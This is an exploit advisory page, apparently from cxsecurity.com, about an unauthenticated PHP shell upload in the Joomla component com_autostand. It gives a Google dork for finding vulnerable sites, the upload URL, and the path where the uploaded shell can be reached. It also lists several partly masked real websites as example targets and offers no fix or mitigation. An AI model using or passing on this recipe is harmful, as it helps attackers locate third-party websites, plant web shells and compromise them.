joomla com_autostand shell upload vulnerability

2012.11.14
Credit: Over-X
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:com_autostand

# Exploit Title: joomla com_autostand file upload # Author: Over-X # email: j1a@hotmail.de # Vendor or Software Link: forum.joomla.org # Version: v3 # Google dork: "inurl:com_autostand" # Tested on: win Xp ------------------------------------------------------------------------------- poc: ---- localhost/path/index.php?option=com_autostand&func=newItem upload shell php and go 2 : -------------------------- localhost/path/images/autostand/images/shell.php examples: http://www.kXXXahan.be//index.php?option=com_autostand&func=newItem http://www.maXXXverdrive.ca//index.php?option=com_autostand&func=newItem http://www.doXXXsupplies.com/index.php?option=com_autostand&func=newItem http://vcXXXuto.com//index.php?option=com_autostand&func=newItem --------------------------------------------------------------------------------------- Gre: Sec4ever.com & Damane2011 & Invectus & Kha&mix & 4chrf & ked Ans & Black_Specter & ms_dz & indoushka & jago-dz & L3b r1z & b0x & scorpion_tn

References:

http://forum.joomla.org/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top